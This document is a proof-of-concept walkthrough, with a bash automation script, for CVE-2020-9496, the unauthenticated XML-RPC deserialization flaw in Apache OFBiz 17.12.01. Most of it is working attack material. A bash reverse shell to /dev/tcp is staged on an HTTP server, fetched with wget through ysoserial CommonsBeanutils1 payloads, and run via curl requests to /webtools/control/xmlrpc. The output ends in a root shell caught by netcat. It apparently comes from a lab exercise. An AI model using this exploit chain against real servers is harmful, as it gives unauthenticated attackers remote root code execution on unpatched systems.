CVE-2020-9496 - RCE

Because the two XML-RPC related requests in webtools (xmlrpc and ping) do not require authentication, they are reachable by an unauthenticated attacker and are vulnerable to unsafe deserialization. This issue was reported to the Apache OFBiz security team by Alvaro Munoz (pwntester@github.com) of the GitHub Security Lab.

The vulnerability exists because /webtools/control/xmlrpc accepts Apache XML-RPC's `<serializable>` extension element, whose content is a base64-encoded Java serialized object that the server deserializes while parsing the request, before any method is dispatched. A remote unauthenticated attacker can exploit this by sending a crafted request containing a gadget chain from a library on the OFBiz classpath (Commons BeanUtils in this PoC). Successful exploitation results in arbitrary code execution as the user running OFBiz.

Affected version: 17.12.01 (the version this PoC was tested against)

Fixed versions: 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this PoC to work we need to drop a shell script on the target first and then execute it, using two separate requests. The ysoserial gadget runs the command through Java's Runtime.exec, which splits the string on whitespace and does not go through a shell, so redirections such as `>&` and `/dev/tcp/...` cannot be used directly in the payload. Staging the reverse shell as a file fetched over HTTP and then running it with bash avoids that limitation.

STEP 1: Create a shell file containing a bash reverse-shell one-liner with your IP address and port.

$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1

STEP 2: Make this file available over HTTP (the target fetches it from this server).

$ sudo python3 -m http.server 80

STEP 3: Generate the payload with ysoserial (change the IP to yours). `ysoserial` here is a wrapper around `java -jar <ysoserial jar>`; the gadget is CommonsBeanutils1 because Commons BeanUtils ships with OFBiz.

$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"

STEP 4: Copy the output of your payload (a very long string starting with `rO0AB`, the base64 form of the Java serialization magic bytes AC ED 00 05).

rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==

STEP 5: Use the curl command below to deliver the payload. Paste the base64 string between the opening `<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">` tag and the closing `</serializable>` tag. The methodName value is arbitrary; deserialization happens while the XML is parsed, before the method is looked up. `-k` is needed because the stock OFBiz install uses a self-signed certificate.

$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

Curl command without the payload, for reference:

$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

After running the curl command, check that the HTTP server received a request for the script:

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -

As you can see, we got a hit on our HTTP server, so the file has been downloaded to the target's /tmp directory as shell.sh. Now create a second payload to execute that file. Before sending it, start a netcat listener on the port used in shell.sh.

STEP 6: Start a netcat listener

$ nc -lvnp 1337
listening on [any] 1337 ...

STEP 7: Create a payload that executes the previously downloaded shell script

$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"

STEP 8: Paste the output into the curl command and execute it

curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

STEP 9: Check the netcat listener for the reverse connection

$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
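The whole two-stage flow above, wrapped in shell functions, as an added example that is not part of the original PoC. It assumes ysoserial can be invoked as `ysoserial` (as in the commands above), that the target listens on OFBiz's default HTTPS port 8443, and uses hypothetical function names (is_java_serialized, build_xmlrpc_body, make_payload, send_payload, exploit). The one thing it adds beyond the original steps is a sanity check that the pasted payload really is a Java serialized stream, since a truncated copy of the long base64 string is the most common reason the request silently does nothing.

```shell
#!/usr/bin/env bash
# Added example, not the original PoC code. Assumptions: `ysoserial` is on
# PATH (wrapper around `java -jar <ysoserial jar>`), the target speaks HTTPS
# on 8443 with a self-signed certificate, and function names are hypothetical.

# Java serialized streams begin with the magic bytes AC ED 00 05, which
# base64-encode to the prefix "rO0AB". Returns 0 if the payload has it.
is_java_serialized() {
    case "$1" in
        rO0AB*) return 0 ;;
        *)      return 1 ;;
    esac
}

# Emit the XML-RPC envelope with the base64 payload inside the Apache
# XML-RPC <serializable> extension element (same body as the curl commands
# above). The methodName is arbitrary: deserialization happens during XML
# parsing, before any method is dispatched.
build_xmlrpc_body() {
    printf '%s' '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">'
    printf '%s' "$1"
    printf '%s' '</serializable></value></member></struct></value></param></params></methodCall>'
}

# Generate a CommonsBeanutils1 payload for a command and return it as a
# single-line base64 string (same as STEP 3 / STEP 7).
make_payload() {
    ysoserial CommonsBeanutils1 "$1" | base64 | tr -d '\n'
}

# POST the envelope to /webtools/control/xmlrpc and print the HTTP status.
# -k is needed because the stock OFBiz install uses a self-signed certificate.
send_payload() {
    target="$1"
    payload="$2"
    if ! is_java_serialized "$payload"; then
        echo "payload is not a Java serialized stream (expected rO0AB... prefix)" >&2
        return 2
    fi
    build_xmlrpc_body "$payload" | curl -k -s -o /dev/null -w '%{http_code}\n' \
        -X POST -H 'Content-Type: application/xml' --data-binary @- \
        "https://${target}:8443/webtools/control/xmlrpc"
}

# Two-stage run: stage shell.sh from the attacker's HTTP server, then run it.
# Remember that Runtime.exec splits on whitespace and uses no shell, so each
# command must be a plain argv, which is why the reverse shell lives in a file.
exploit() {
    target="$1"
    attacker="$2"
    send_payload "$target" "$(make_payload "wget ${attacker}/shell.sh -O /tmp/shell.sh")"
    sleep 2
    send_payload "$target" "$(make_payload "bash /tmp/shell.sh")"
}

# Usage (with the HTTP server and netcat listener from STEP 2 / STEP 6 running):
#   exploit 10.129.x.x 10.10.x.x
```

The two curl invocations in the original are reproduced by `send_payload`; the only behavioural difference is that the body is piped to curl with `--data-binary @-` instead of being pasted inline, which avoids shell quoting problems with the long base64 string.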